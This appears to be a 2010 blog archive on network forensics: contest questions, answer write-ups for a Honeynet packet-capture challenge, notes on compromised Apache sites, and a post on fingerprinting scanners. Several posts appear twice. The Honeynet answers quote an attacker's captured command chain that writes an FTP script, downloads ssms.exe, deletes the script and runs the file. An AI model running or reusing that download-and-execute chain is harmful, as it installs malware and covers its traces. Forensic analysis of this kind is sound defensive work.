More information at their site, but here is what they are asking you to find.
1. What was the IP address of Mr. X’s scanner?
2. What type of port scan(s) did Mr. X conduct? Check all that apply:
* TCP SYN
* TCP ACK
* UDP
* TCP Connect
* TCP XMAS
* TCP RST
3. What were the IP addresses of the targets Mr. X discovered?
4. What was the MAC address of the Apple system he found?
5. What was the IP address of the Windows system he found?
6. What TCP ports were open on the Windows system? (Please list the decimal numbers from lowest to highest.)
X-TRA CREDIT (You don’t have to answer this, but you get super bonus points if you do): What was the name of the tool Mr. X used to port scan? How can you tell? Can you reconstruct the output from the tool, roughly the way Mr. X would have seen it?
Deadline is 3/04/10 (11:59:59PM UTC-11) (In other words, if it’s still 3/04/10 anywhere in the world, you can submit your entry.)
Subscribe To
Posts
All Comments
Thursday, February 4, 2010
Tuesday, February 2, 2010
Forensics Contest #3 - Answers
Ok, not going to do a writeup on this one. NetworkMiner was able to pull all the info out without much work. Thankfully it puts tcp packets back together and reconstructs the .xml files in question. Hopefully someone out there was able to come up with a new script to pull all the info they wanted, but it wasn't me, that is for sure!
My answers were:
1. 002500FE07C4
2. AppleTV/2.4
3. h, ha, hac, hack
4. Hackers
5. http://a227.v.phobos.apple.com/us/r1000/008/Video/62/bd/1b/mzm.plqacyqb..640x278.h264lc.d2.p.m4v
6. Sneakers
7. $9.99
8. iknowyourewatchingme
My answers were:
1. 002500FE07C4
2. AppleTV/2.4
3. h, ha, hac, hack
4. Hackers
5. http://a227.v.phobos.apple.com/us/r1000/008/Video/62/bd/1b/mzm.plqacyqb..640x278.h264lc.d2.p.m4v
6. Sneakers
7. $9.99
8. iknowyourewatchingme
Honeynet Challenge #1 - Answers
The deadline was yesterday, so I think I'm ok posting my answers. Not sure if these are correct or not, but this is what I submitted. If anyone has any questions let me know. Again, this was a fun exercise:
Question 1. Which systems (i.e. IP addresses) are involved?
Tools Used: Satori, NetworkMiner, and Wireshark
192.150.11.111 – End system
98.114.205.102 - Attacker
-----
Question 2. What can you find out about the attacking host (e.g., where is it located)?
Tools Used: WHOIS, Wireshark
TTL – 113, since appears to be a windows box, 15 hops away.
According to: http://www.ipaddresslocation.org/ip-address-locator.php
They are most likely located in/around Southampton Pennsylvania, which is where the local Verizon Internet Services office is located at least.
Attack System appears to be a Windows 2000 system (TTL puts it as Windows (typically) and TCP fingerprint put it as a Windows 2000, XP or 2003 box and SMB puts it as Windows 2000 and SMB is the most reliable of those mentioned normally).
-----
Question 3. How many TCP sessions are contained in the dump file?
Tools Used: NetworkMiner, verified with Wireshark
5 total:
- 4 from 98.114.205.102
- 1 from 192.150.11.111
-----
Question 4. How long did it take to perform the attack?
Tools Used: wireshark Awarded Points:
It depends on what part you consider the actual attack:
Max of 16.2 seconds from the first packet to the last packet in the capture. Most of the time is actually FTP’ing a file.
Within the first 2 seconds the Buffer Overflow has already taken place. The next 14 seconds are sending the command to the system and FTP’ing the file.
-----
Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?
Tools Used: Satori, wireshark
192.150.11.111
2 competing fingerprints:
* Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel.
* SMB packets on the otherhand claim it is on the VIDCAM Domain and running Windows 5.1 (packet 16 & 19)
Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; Trying to exploit MS04-011, targeting the Windows LSA Service.
-----
Question 6. Can you sketch an overview of the general actions performed by the attacker?
Tools Used: wireshark
Authenticates as a null user to ipc$, peforms a DsRoleUpgradeDownlevelServer Buffer Overflow. Once exploited forces the system to FTP a file.
First they dump these commands in the file ‘o’:
open 0.0.0.0 8884
user 1 1
get ssms.exe
Then they do:
ftp –n –s:o (Suppresses auto-login and reads data in from the ‘o’ file)
Delete the ‘o’ file to make sure nobody can see what they did, forcing it quite mode and deleting of read only files, just in case.
Then launch ssms.exe
-----
Question 7. What specific vulnerability was attacked?
MS04-011, good writeup at:
http://research.eeye.com/html/advisories/published/AD20040413C.html
-----
Question 8. What actions does the shellcode perform? Pls list the shellcode
Tools Used: wireshark, trace tcp conversation
It targets DSRoleUpgradeDownLevelServer, does a buffer overflow of a lot of 0x31, or 1’s in ascii. As soon as that is done it starts a new TCP conversation and does this (more info back in question #6)
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
ssms.exe
It appears to call ssms.exe twice, not sure if that is by design or due to a bug???
-----
Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
Tools Used: Satori (http://myweb.cableone.net/xnih)
Yes. Go back to #5. TCP fingerprint shows the box as Linux 2.6, SMB shows the box as Windows XP. The TTL can be tweaked on windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that can be done that may allow this.
-----
Question 10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge)
Smss.exe, may be W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say. That is just a guess based on the name and the name alone.
-----
Question 11. Do you think this is a manual or an automated attack? Why?
Automated, it only took 16 seconds from start to finish. Typing this sentence up took that long with a few typo’s! Not to mention, most of that 16.2 seconds was downloading the ssms.exe file. So while it is possible someone sat there and did it, due to the quickness in which it took place it seems unlikely.
Question 1. Which systems (i.e. IP addresses) are involved?
Tools Used: Satori, NetworkMiner, and Wireshark
192.150.11.111 – End system
98.114.205.102 - Attacker
-----
Question 2. What can you find out about the attacking host (e.g., where is it located)?
Tools Used: WHOIS, Wireshark
TTL – 113, since appears to be a windows box, 15 hops away.
According to: http://www.ipaddresslocation.org/ip-address-locator.php
They are most likely located in/around Southampton Pennsylvania, which is where the local Verizon Internet Services office is located at least.
Attack System appears to be a Windows 2000 system (TTL puts it as Windows (typically) and TCP fingerprint put it as a Windows 2000, XP or 2003 box and SMB puts it as Windows 2000 and SMB is the most reliable of those mentioned normally).
-----
Question 3. How many TCP sessions are contained in the dump file?
Tools Used: NetworkMiner, verified with Wireshark
5 total:
- 4 from 98.114.205.102
- 1 from 192.150.11.111
-----
Question 4. How long did it take to perform the attack?
Tools Used: wireshark Awarded Points:
It depends on what part you consider the actual attack:
Max of 16.2 seconds from the first packet to the last packet in the capture. Most of the time is actually FTP’ing a file.
Within the first 2 seconds the Buffer Overflow has already taken place. The next 14 seconds are sending the command to the system and FTP’ing the file.
-----
Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?
Tools Used: Satori, wireshark
192.150.11.111
2 competing fingerprints:
* Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel.
* SMB packets on the otherhand claim it is on the VIDCAM Domain and running Windows 5.1 (packet 16 & 19)
Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; Trying to exploit MS04-011, targeting the Windows LSA Service.
-----
Question 6. Can you sketch an overview of the general actions performed by the attacker?
Tools Used: wireshark
Authenticates as a null user to ipc$, peforms a DsRoleUpgradeDownlevelServer Buffer Overflow. Once exploited forces the system to FTP a file.
First they dump these commands in the file ‘o’:
open 0.0.0.0 8884
user 1 1
get ssms.exe
Then they do:
ftp –n –s:o (Suppresses auto-login and reads data in from the ‘o’ file)
Delete the ‘o’ file to make sure nobody can see what they did, forcing it quite mode and deleting of read only files, just in case.
Then launch ssms.exe
-----
Question 7. What specific vulnerability was attacked?
MS04-011, good writeup at:
http://research.eeye.com/html/advisories/published/AD20040413C.html
-----
Question 8. What actions does the shellcode perform? Pls list the shellcode
Tools Used: wireshark, trace tcp conversation
It targets DSRoleUpgradeDownLevelServer, does a buffer overflow of a lot of 0x31, or 1’s in ascii. As soon as that is done it starts a new TCP conversation and does this (more info back in question #6)
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
ssms.exe
It appears to call ssms.exe twice, not sure if that is by design or due to a bug???
-----
Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
Tools Used: Satori (http://myweb.cableone.net/xnih)
Yes. Go back to #5. TCP fingerprint shows the box as Linux 2.6, SMB shows the box as Windows XP. The TTL can be tweaked on windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that can be done that may allow this.
-----
Question 10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge)
Smss.exe, may be W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say. That is just a guess based on the name and the name alone.
-----
Question 11. Do you think this is a manual or an automated attack? Why?
Automated, it only took 16 seconds from start to finish. Typing this sentence up took that long with a few typo’s! Not to mention, most of that 16.2 seconds was downloading the ssms.exe file. So while it is possible someone sat there and did it, due to the quickness in which it took place it seems unlikely.
Monday, January 25, 2010
Honeynet - Challenge 1 of the Forensic Challenge 2010
Ok, I posted this a week or so ago to the NetworkMiner beta list, but forgot to put anything up on here about it. This was a fun exercise, different than the other ones I've done and posted about recently.
It was short notice when I put it on that list, even shorter here, but...
In this case, no need to write code, just find the answers and tell them what program(s) you used.
----
The Challenge:
A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:
1. Which systems (i.e. IP addresses) are involved? (2pts)
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
3. How many TCP sessions are contained in the dump file? (2pts)
4. How long did it take to perform the attack? (2pts)
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
7. What specific vulnerability was attacked? (2pts)
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
11. Do you think this is a manual or an automated attack? Why? (2pts)
It was short notice when I put it on that list, even shorter here, but...
In this case, no need to write code, just find the answers and tell them what program(s) you used.
----
The Challenge:
A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:
1. Which systems (i.e. IP addresses) are involved? (2pts)
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
3. How many TCP sessions are contained in the dump file? (2pts)
4. How long did it take to perform the attack? (2pts)
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
7. What specific vulnerability was attacked? (2pts)
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
11. Do you think this is a manual or an automated attack? Why? (2pts)
Sunday, January 24, 2010
Infected sites and Google Alerts
Not as much on OS fingerprinting, but due to alerts I have setup from google alerts on fingerprinting I've been getting a look at a couple hundred sites that have been taken over in some form or another since just before Christmas. I'm getting google to notify me of compromised sites and I don't want it anymore, I want to go back to useful alerts for new info on fingerprinting out there!
Sites end up being:
http://somewhere.wherever/5-6 character junk/
The first 2 I saw I actually dropped notes to those compromised and was happy to see them clean them up, patched I have no idea, but cleaned up.
Everything was Apache from what I could tell doing Banner Grabbing with Satori. It wasn't something I was too worried about, but .....
Could be an apache hole, openssl, php, etc. Hard to say.
Looking at one that has been compromised since Christmas the following layout is there:
1g
1r.txt
1t
2.js
2r.txt
academia.php
accenture.php
....
fingeprinting.php
...
passive.php
1g -
file seems to list a ton of other sites, possibly ones compromised or possibly ones to dump you off to. I played around a bit with it back at Christmas, assumed the problem would go away and forgot about it for the most part. But since it is a month later and I'm still getting new ones each day I figured I'd at least post something on it.
1t -
possibly usernames it is trying
2r -
php files it is going to create
Simple search to find pages with google to get an idea:
"fingerprinting the dead with rigor morits"
Based on file times I assume there is some type of automated scan they are doing and dumping their first .php file on it. Then someone is going through those lists 12-24 hours later and uploading the rest. Just looking at timestamps on the files there is typically one file created on day 0, then all the others get created the next day, but not all at the same time, one here, one there.
Anyway, if anyone is going to go poking around, make sure you just the subdir (directory listing is turned on in all the ones I looked at), such as:
http://xxxxxxxx.com/z1jyed/fingerprinting.php
only go to:
http://xxxxxxxx.com/z1jyed/
Oh yeah, I was going to go poke around on some of my Apache boxes and make sure they weren't compromised. Maybe tomorrow.
Sites end up being:
http://somewhere.wherever/5-6 character junk/
The first 2 I saw I actually dropped notes to those compromised and was happy to see them clean them up, patched I have no idea, but cleaned up.
Everything was Apache from what I could tell doing Banner Grabbing with Satori. It wasn't something I was too worried about, but .....
Could be an apache hole, openssl, php, etc. Hard to say.
Looking at one that has been compromised since Christmas the following layout is there:
1g
1r.txt
1t
2.js
2r.txt
academia.php
accenture.php
....
fingeprinting.php
...
passive.php
1g -
file seems to list a ton of other sites, possibly ones compromised or possibly ones to dump you off to. I played around a bit with it back at Christmas, assumed the problem would go away and forgot about it for the most part. But since it is a month later and I'm still getting new ones each day I figured I'd at least post something on it.
1t -
possibly usernames it is trying
2r -
php files it is going to create
Simple search to find pages with google to get an idea:
"fingerprinting the dead with rigor morits"
Based on file times I assume there is some type of automated scan they are doing and dumping their first .php file on it. Then someone is going through those lists 12-24 hours later and uploading the rest. Just looking at timestamps on the files there is typically one file created on day 0, then all the others get created the next day, but not all at the same time, one here, one there.
Anyway, if anyone is going to go poking around, make sure you just the subdir (directory listing is turned on in all the ones I looked at), such as:
http://xxxxxxxx.com/z1jyed/fingerprinting.php
only go to:
http://xxxxxxxx.com/z1jyed/
Oh yeah, I was going to go poke around on some of my Apache boxes and make sure they weren't compromised. Maybe tomorrow.
Monday, January 4, 2010
Passive Fingerprinting of Network Reconnaissance Tools
Last month I ran across the initial 3 page IEEE summary of this thesis paper. At the time I wasn't able to find a full copy of it. Though now it looks like there is a copy out there dtic.mil
In a nutshell they look at the visual fingerprint a scanner, such as NMAP, UnicornScan, etc makes as it scans a system. By utilizing the information they obtain they can tell what program is scanning your system.
Anyway, interesting twist, fingerprinting the application scanning you. I had looked at doing this with some products, but never to this extent, very nicely done!
In a nutshell they look at the visual fingerprint a scanner, such as NMAP, UnicornScan, etc makes as it scans a system. By utilizing the information they obtain they can tell what program is scanning your system.
Anyway, interesting twist, fingerprinting the application scanning you. I had looked at doing this with some products, but never to this extent, very nicely done!
Monday, December 28, 2009
Forensics Contest #3 released
For the holidays they released challenge #3. This time you'll need to reassemble packets to get the whole picture! May be beyond what I can throw together in perl, actually 99% sure it is since I tried to do this a little last time. I'll probably write something in C or Pascal for it. Problem with doing it in pascal is they are going to want the source and I'm not sure i'm willing to give up my source on winpcap stuff. We'll see, maybe use something else to rip the traffic out and then just put a nice gui front end on it with pascal. Who knows.
Anyway, check it out.
Anyway, check it out.
Subscribe to:
Posts (Atom)